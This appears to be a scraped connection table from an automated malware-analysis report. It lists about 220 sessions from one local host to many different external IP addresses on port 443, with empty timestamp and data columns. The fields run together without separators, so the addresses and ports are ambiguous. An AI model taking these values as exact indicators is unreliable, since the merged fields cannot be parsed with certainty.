                                              13759192.168.2.1440916194.88.79.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13760192.168.2.1454214198.149.136.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13761192.168.2.1435204103.178.218.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13762192.168.2.1449258109.36.48.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13763192.168.2.145513832.59.129.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13764192.168.2.1457976101.252.170.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13765192.168.2.1447872142.42.149.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13766192.168.2.1455586121.140.200.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13767192.168.2.143480814.45.236.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13768192.168.2.1443282143.247.224.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13769192.168.2.1454332194.226.28.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13770192.168.2.14577569.24.212.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13771192.168.2.1443950141.71.75.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13772192.168.2.145966653.243.167.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13773192.168.2.145960863.224.178.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13774192.168.2.1434358167.203.223.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13775192.168.2.1435562157.250.70.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13776192.168.2.1453852178.232.221.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13777192.168.2.145620050.204.224.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13778192.168.2.143836673.115.106.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13779192.168.2.1455912186.76.27.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13780192.168.2.1449446200.97.185.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13781192.168.2.1454674158.185.69.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13782192.168.2.1455980103.199.122.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13783192.168.2.145605648.109.97.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13784192.168.2.143410858.10.91.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13785192.168.2.144811436.132.204.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13786192.168.2.1441664111.219.47.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13787192.168.2.1446142162.202.37.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13788192.168.2.145222818.71.188.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13789192.168.2.1439500131.143.35.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13790192.168.2.144795248.97.130.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13791192.168.2.1445668137.231.215.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13792192.168.2.1453704156.110.143.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13793192.168.2.1455012155.195.71.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13794192.168.2.14352364.217.147.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13795192.168.2.14595701.76.149.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13796192.168.2.1441250137.180.65.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13797192.168.2.144268090.179.161.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13798192.168.2.1448272220.176.163.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13799192.168.2.145563695.183.85.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13800192.168.2.1437452136.42.214.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13801192.168.2.1444054197.231.153.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13802192.168.2.143921868.107.90.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13803192.168.2.1437926124.195.233.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13804192.168.2.1460020123.112.179.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13805192.168.2.146013219.71.214.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13806192.168.2.145754654.250.239.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13807192.168.2.145362234.136.90.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13808192.168.2.1445638197.96.100.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13809192.168.2.1433192147.64.29.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13810192.168.2.1455540221.154.248.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13811192.168.2.1438472113.64.131.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13812192.168.2.1457552125.37.106.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13813192.168.2.1445654205.103.215.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13814192.168.2.143950836.212.56.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13815192.168.2.14341864.165.92.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13816192.168.2.144049888.229.213.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13817192.168.2.1433994221.83.181.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13818192.168.2.145793081.34.77.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13819192.168.2.146035014.88.140.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13820192.168.2.1433542216.140.177.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13821192.168.2.143335082.134.48.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13822192.168.2.1445092177.33.151.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13823192.168.2.146096647.168.161.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13824192.168.2.1438780180.75.43.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13825192.168.2.1452514171.156.0.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13826192.168.2.144818861.144.176.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13827192.168.2.1457460155.86.204.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13828192.168.2.1434870107.17.230.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13829192.168.2.144728824.153.9.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13830192.168.2.1438448156.156.61.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13831192.168.2.1437638125.22.40.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13832192.168.2.1433286165.152.208.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13833192.168.2.1446552154.127.84.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13834192.168.2.145263088.117.43.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13835192.168.2.1434906149.3.193.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13836192.168.2.143788634.7.90.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13837192.168.2.1436160208.181.46.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13838192.168.2.145003647.104.60.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13839192.168.2.1447278185.161.58.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13840192.168.2.145144850.42.231.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13841192.168.2.143764060.111.218.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13842192.168.2.1441386165.209.79.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13843192.168.2.1458056109.198.77.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13844192.168.2.1440754221.149.49.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13845192.168.2.1454602183.6.146.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13846192.168.2.1441960142.95.157.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13847192.168.2.1445934108.132.251.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13848192.168.2.143737497.28.28.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13849192.168.2.1441218147.20.252.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13850192.168.2.14505264.184.116.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13851192.168.2.1449404136.184.203.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13852192.168.2.1449742219.140.51.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13853192.168.2.1448250136.119.116.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13854192.168.2.1448288198.55.253.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13855192.168.2.1440378212.14.206.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13856192.168.2.1442044223.229.112.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13857192.168.2.144378286.118.131.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13858192.168.2.146024640.168.1.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13859192.168.2.145265639.30.113.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13860192.168.2.144992852.119.239.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13861192.168.2.144954675.216.61.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13862192.168.2.14397704.109.215.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13863192.168.2.14484948.87.48.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13864192.168.2.1449622112.63.147.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13865192.168.2.1443044113.162.239.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13866192.168.2.143442681.143.63.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13867192.168.2.1446076172.172.91.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13868192.168.2.143535072.46.31.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13869192.168.2.144539674.31.172.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13870192.168.2.1453502112.4.73.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13871192.168.2.145132042.34.201.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13872192.168.2.1451020113.57.118.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13873192.168.2.1459720128.240.45.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13874192.168.2.145936214.214.2.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13875192.168.2.1440816213.20.122.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13876192.168.2.1449698186.247.249.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13877192.168.2.1438580174.223.238.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13878192.168.2.1459926223.69.186.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13879192.168.2.1452326181.12.5.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13880192.168.2.145738863.210.83.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13881192.168.2.143770081.74.198.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13882192.168.2.1432992180.54.155.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13883192.168.2.145619475.139.32.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13884192.168.2.1447400138.15.35.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13885192.168.2.144163690.59.111.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13886192.168.2.1452628220.38.226.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13887192.168.2.1445412144.144.247.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13888192.168.2.1449088181.152.243.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13889192.168.2.1449796119.96.106.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13890192.168.2.144529270.53.140.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13891192.168.2.1449364103.194.71.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13892192.168.2.145807631.63.80.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13893192.168.2.145652087.138.132.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13894192.168.2.14414789.140.120.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13895192.168.2.144103472.195.241.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13896192.168.2.14429481.98.124.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13897192.168.2.1437952205.26.36.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13898192.168.2.1433906130.113.18.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13899192.168.2.1450752111.125.37.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13900192.168.2.1433730210.204.49.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13901192.168.2.1436090140.158.90.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13902192.168.2.1433716185.174.153.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13903192.168.2.1447730202.126.221.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13904192.168.2.145380284.214.73.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13905192.168.2.145252018.191.141.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13906192.168.2.1439354194.211.214.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13907192.168.2.1437108136.1.98.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13908192.168.2.1453292156.137.174.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13909192.168.2.1449776132.233.57.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13910192.168.2.1437882180.79.71.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13911192.168.2.144132041.211.178.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13912192.168.2.1457206133.109.210.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13913192.168.2.1440280209.117.0.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13914192.168.2.144530253.226.226.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13915192.168.2.144538442.180.241.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13916192.168.2.145317213.53.183.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13917192.168.2.1446842131.94.207.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13918192.168.2.145083439.65.77.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13919192.168.2.144944844.63.26.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13920192.168.2.1447008166.69.123.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13921192.168.2.145666045.208.19.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13922192.168.2.1458426113.238.103.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13923192.168.2.1454916165.111.124.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13924192.168.2.145126846.24.26.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13925192.168.2.1433226125.26.2.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13926192.168.2.145450680.103.37.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13927192.168.2.144321686.159.147.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13928192.168.2.1448752131.229.7.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13929192.168.2.1453224155.49.164.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13930192.168.2.1439402183.47.136.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13931192.168.2.144271468.88.106.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13932192.168.2.145334236.235.236.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13933192.168.2.1454206183.60.210.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13934192.168.2.1438936103.197.15.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13935192.168.2.1452668117.212.161.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13936192.168.2.1452690153.173.28.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13937192.168.2.143410075.16.221.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13938192.168.2.144384093.32.1.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13939192.168.2.145953288.252.239.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13940192.168.2.1453824204.2.177.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13941192.168.2.1458734132.61.249.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13942192.168.2.1458714204.125.249.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13943192.168.2.1450194208.8.108.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13944192.168.2.143623812.40.67.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13945192.168.2.144759288.190.235.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13946192.168.2.144245691.194.202.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13947192.168.2.144555486.186.215.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13948192.168.2.145251638.212.211.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13949192.168.2.1444162200.182.200.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13950192.168.2.143333697.0.132.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13951192.168.2.1457204179.149.48.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13952192.168.2.1449312123.55.12.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13953192.168.2.143590265.42.72.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13954192.168.2.1454102135.93.240.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13955192.168.2.145701843.0.103.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13956192.168.2.1453098157.23.115.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13957192.168.2.1446980119.99.162.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13958192.168.2.1451774213.97.246.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13959192.168.2.1437402168.28.210.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13960192.168.2.144161263.251.135.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13961192.168.2.144479242.7.6.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13962192.168.2.1447084169.17.232.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13963192.168.2.143793632.89.241.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13964192.168.2.1460602219.82.34.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13965192.168.2.145086473.167.211.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13966192.168.2.1451628178.19.37.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13967192.168.2.1459912102.201.6.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13968192.168.2.145054031.38.16.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13969192.168.2.1453542200.24.189.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13970192.168.2.145622884.17.136.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13971192.168.2.146082841.155.237.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13972192.168.2.1448866161.250.229.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13973192.168.2.1455628106.105.30.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13974192.168.2.1437372135.105.182.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13975192.168.2.144124666.159.42.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13976192.168.2.1453136211.215.107.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13977192.168.2.1458010113.162.132.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13978192.168.2.1434132157.212.215.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13979192.168.2.14478885.197.202.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13980192.168.2.1449706201.151.28.129443
                                              TimestampBytes transferredDirectionData


